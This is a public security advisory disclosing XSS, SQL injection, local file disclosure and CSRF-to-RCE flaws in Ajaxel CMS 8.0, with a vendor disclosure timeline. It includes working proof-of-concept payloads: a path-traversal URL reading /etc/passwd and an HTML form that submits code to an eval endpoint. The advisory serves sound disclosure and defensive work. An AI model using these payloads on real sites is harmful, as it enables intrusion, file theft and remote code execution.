Ajaxel CMS 8.0 XSS / CSRF / File Disclosure / SQL Injection

`Ajaxel CMS 8.0 Multiple Vulnerabilities  
  
Vendor: Ajaxel  
Product web page: http://www.ajaxel.com  
Affected version: 8.0 and below  
  
Summary: Ajaxel CMS is very simple ajaxified CMS and framework  
for any project needs.  
  
Desc: Ajaxel CMS version 8.0 and below suffers from multiple  
vulnerabilities inlcuding LFI, XSS, SQL injection and remote  
code execution via CSRF.  
  
Tested on: Apache 2.4.10  
MySQL 5.5.46  
  
Vendor status:  
[13.04.2016] Vulnerabilities discovered.  
[14.04.2016] Vendor contacted.  
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.  
[05.05.2016] Public security advisory released.  
  
Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski  
[dizzyduck_at_zeroscience.mk]  
  
  
1. Reflected XSS:  
-----------------  
  
GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1  
Host: 192.168.10.5  
  
HTTP/1.0 404 Not Found  
...  
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,  
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',  
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,  
URL_KEY_ADMIN:'cms',...  
  
  
2. SQL Injection:  
-----------------  
  
http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>  
  
  
3. Local File Disclosure:  
-------------------------  
  
http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd  
  
  
4. Cross-Site Request Forgery - RCE PoC:  
----------------------------------------  
  
<html>  
<body>  
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"  
method="POST">  
<input type="hidden" name="data[eval]"  
value="phpinfo();" />  
<input type="hidden" name="a" value="eval" />  
<input type="hidden"  
name="settings_eval_tab_eval-submitted" value="1" />  
<input type="submit" value="Execute" />  
</form>  
</body>  
</html>  
`